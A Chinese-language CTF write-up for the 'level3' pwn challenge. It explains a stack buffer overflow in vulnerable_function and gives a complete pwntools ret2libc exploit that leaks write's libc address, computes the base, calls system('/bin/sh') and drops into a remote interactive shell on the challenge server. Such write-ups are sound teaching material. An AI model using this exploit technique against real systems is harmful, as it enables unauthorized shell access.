level3

题目描述:libc!libc!这次没有system,你能帮菜鸡解决这个难题么?

题目附件: 附件1

 

 

下载下来是一个gz包,用gz -d 命令解包

然后调用file发现是一个tar,用tar -xf 命令解包

之后是一个level3程序,和一个libc_32.so.6

file如下:

level3

 

32位ELF文件

 checksec如下:

level3

 

 IDA反汇编,查看main函数:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}

查看vulnerable_function函数:

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  write(1, "Input:\n", 7u);
  return read(0, &buf, 0x100u);
}

存在栈溢出漏洞,我们可以通过buf的溢出,使程序运行libc中的system函数,首先需要获得libc地址

我们选择利用已经被使用过的write函数获得其真实地址,从而计算offset获得libc地址

但是每次运行程序libc地址都不同,所以需要让程序输出完地址后返回main函数继续运行

NOTE:32位程序调用函数后,第一个4字节会是返回地址

exp如下:

from pwn import *

elf = ELF('./level3')
libc = ELF('./libc_32.so.6')

#io = process('./level3', env = {'LD_PRELOAD': './libc_32.so.6'})
io = connect('220.249.52.133', 44239)

write_plt_addr = elf.plt['write']
write_got_addr = elf.got['write']
main_addr = elf.symbols['main']

payload1 = b'a'*0x8c + p32(write_plt_addr) + p32(main_addr) + p32(1) + p32(write_got_addr) + p32(4)

io.sendlineafter('Input:\n', payload1)

write_addr = u32(io.recv(4))
libc.address = write_addr - libc.symbols['write']
system_addr = libc.symbols['system']
binsh_addr = next(libc.search(b'/bin/sh'))

payload2 = b'a'*0x8c + p32(system_addr) + p32(0) + p32(binsh_addr)

io.sendlineafter('Input:\n', payload2)

io.interactive()

 

上一篇:错误: fatal error: bits/libc-header-start.h: No such file or directory #include


下一篇:
ctfwiki---基本ROP